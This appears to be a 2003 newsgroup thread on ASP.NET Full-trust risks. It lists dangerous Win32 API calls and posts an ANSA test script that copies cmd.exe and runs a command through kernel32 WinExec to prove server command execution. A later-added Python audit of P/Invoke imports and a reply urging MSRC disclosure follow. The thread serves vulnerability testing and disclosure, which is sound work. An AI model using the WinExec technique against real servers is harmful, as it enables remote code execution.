Asp.Net.Vulnerability: Win32 API calls (potential security problems)

 
 
Dinis Cruz
      10-16-2003
Asp.Net.Vulnerability: Win32 API calls (potential security problems)

Since Win32 calls are supported in ASP.NET and cannot be disabled when
the website is running with 'Full trust', it is imperative to identify
all potentially dangerous Win32 DLLs. Here is a short list of the ones
we have identified whose risk needs to be validated and (if required)
write test scripts for:

- New: CopyMemory, GetCurrentProcess, GetCurrentThread,
GetTokenInformation, GetWindowsInformation, isNTAdmin,
OpenProcessToken, OpenThreadToken, SendMessage
- Compress: CopyLZFile, LZCopy
- Crypto: CryptGetUserKey, CryptDestroyKey
- Drives: GetLogicalDrives, GetVolumeInformation
- EnvironmentVariables: GetEnvironmentString, GetEnvironmentVariable
- Error: RaiseException, ReportFault, SetLastError
- EventLog: OpenEventLog, ClearEventLog, ReportEvent
- Exit: ExitWindowsEx, FatalAppExit, InitiateSystemShutdown,
LockWorkstation
- Files: CopyFile, CreateFile, GetFileAttributes, MoveFile, OpenFile,
ReadFile, SetFileAttributes, SetFilePointer, SHGetFileInfo,
TouchFileTimes, WriteFile
- FindFile: FindClose, FindFirstFile, FindNextFile
- Heap: GetProcessHeap, HeapAlloc, HeapFree
- Hook: CallNextHookEx, SetWindowsHookEx
- ICMP: IcmpCreateFile, IcmpSendEcho
- INI-Files: GetPrivateProfileSection, GetPrivateProfileString
- Internet: FtpGetFile, InternetAttemptConnect, InternetConnect,
InternetOpen, InternetOpenURL, InternetReadFile,
IsDestinationReachable, IsNetworkAlive, IsValidURL, URLDownloadToFile
- {List not completed}

Since we are not Win32 API experts (although we did manage to write a
test script for the Kernel32 'WinExec' - see below) we would like to ask
for help from the more serious Win32 developers, who will be able to
provide us with much more detailed and accurate information regarding
the 'security risk' posed by each API call.

The following is the code that we use in ANSA to test if a server is
vulnerable.

'****************************************************************
' ANSA:W32_execute_cmd - This test checks if it is possible to execute
' commands on the server using a direct Win32 API call to the
' kernel32 'winExec' function. For this test to work a copy of 'cmd.exe'
' must be copied to the same directory containing this script
'****************************************************************

<script runat=server>

Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long

public Function Run_test(mode)

    try
        Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
        Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
        Dim FailIfExists

        Dim Cmd_to_execute = "dir"

        local_dir = left(request.servervariables("PATH_TRANSLATED"), _
            inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
        local_copy_of_cmd = Local_dir+"cmd.exe"
        Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\_test.exe"

        ' Copy CMD.EXE to temp directory
        CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)

        ' Execute Command and save results in temp file
        errReturn = WinExec(Target_copy_of_cmd + " /c " + cmd_to_execute, 10)

        Run_test = OK + Critical +" The server allows the remote execution of commands using a direct call to WinExec API!"
    catch
        Run_test = OK + low + "It was not possible to execute commands using cmd.exe"
    end try

end function

</script>

'****************************************************************

Thanks for the help

Best regards
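
A defensive counterpart to the test script in the post above, added here as an example and not part of the original thread or of ANSA: a Python audit that lists the native imports declared in ASP.NET source and reports the configured trust level. The watchlist subset, the "Exec" label, the function names and the sample inputs are assumptions made for this illustration.

```python
import re
import xml.etree.ElementTree as ET

# Subset of the post's list (keyed by lower-cased export name, without the
# ANSI/Unicode suffix) plus WinExec from its test script. Category labels
# follow the post; "Exec" is a label added here.
WATCHLIST = {
    "winexec": "Exec", "copyfile": "Files", "createfile": "Files",
    "movefile": "Files", "openprocesstoken": "New", "sendmessage": "New",
    "setwindowshookex": "Hook", "cleareventlog": "EventLog",
    "exitwindowsex": "Exit", "initiatesystemshutdown": "Exit",
}
# VB: Declare Function Name Lib "dll" [Alias "Export"]
VB_DECL = re.compile(r'Declare\s+(?:(?:Ansi|Unicode|Auto)\s+)?(?:Function|Sub)\s+(\w+)'
                     r'\s+Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?', re.I)
# C#: [DllImport("dll", ...)] ... extern <type> Name(
CS_DECL = re.compile(r'\[\s*DllImport\s*\(\s*"([^"]+)"[^\]]*\]\s*[^;{]*?'
                     r'\bextern\s+[\w.\[\]]+\s+(\w+)\s*\(', re.I | re.S)

def category(export):
    """Look up an export, trying the name with its A/W suffix removed as well."""
    name = export.lower()
    return WATCHLIST.get(name) or WATCHLIST.get(name[:-1] if name[-1] in "aw" else name, "unlisted")

def find_native_imports(source):
    """Return sorted (dll, export, category) for each P/Invoke declaration."""
    found = {(dll, alias or name) for name, dll, alias in VB_DECL.findall(source)}
    found |= {(dll, name) for dll, name in CS_DECL.findall(source)}
    return sorted((re.sub(r"\.dll$", "", d.lower()), e, category(e)) for d, e in found)

def trust_level(web_config_xml):
    """Return the <trust level="..."> value; ASP.NET runs at Full when none is set."""
    for el in ET.fromstring(web_config_xml).iter():
        if el.tag.rsplit("}", 1)[-1] == "trust":   # tolerate an XML namespace
            return el.get("level", "Full")
    return "Full"

# Constructed sample, modelled on the post's declarations plus one unlisted import.
SAMPLE_PAGE = '''<script runat=server>
Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal
lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal a As String) As Long
Declare Function Beep Lib "kernel32" (ByVal f As Integer, ByVal d As Integer) As Integer
</script>'''
SAMPLE_CONFIG = '<configuration><system.web><trust level="Full"/></system.web></configuration>'

if __name__ == "__main__":
    print("trust level:", trust_level(SAMPLE_CONFIG))
    for dll, export, cat in find_native_imports(SAMPLE_PAGE):
        print(f"{dll}!{export}: {cat}")
```

The C# pattern reads the method name only, so a `DllImport` that renames its target through `EntryPoint` is reported under the managed name.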
 
Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]
      10-17-2003
Dinis ..why not forward this as it should be to

The Microsoft Security Response Center (MSRC) draws on the hundreds of
security professionals at Microsoft to form virtual teams that respond
to reports of security issues with Microsoft products or technologies.
To report a suspected vulnerability, please send e-mail to
.

Posting a potential vulnerability to a public newsgroup is not showing
good judgement for disclosure of vulnerabilities assuming these are valid.

Report responsibility for all of our benefit on the Internet.

Susan

--
"Don't lose sight of security. Security is a state of being,
not a state of budget. He with the most firewalls still does
not win. Put down that honeypot and keep up to date on your patches.
Demand better security from vendors and hold them responsible.
Use what you have, and make sure you know how to use it properly
and effectively."
~Rain Forest Puppy
http://www.wiretrip.net/rfp/txt/evolution.txt

 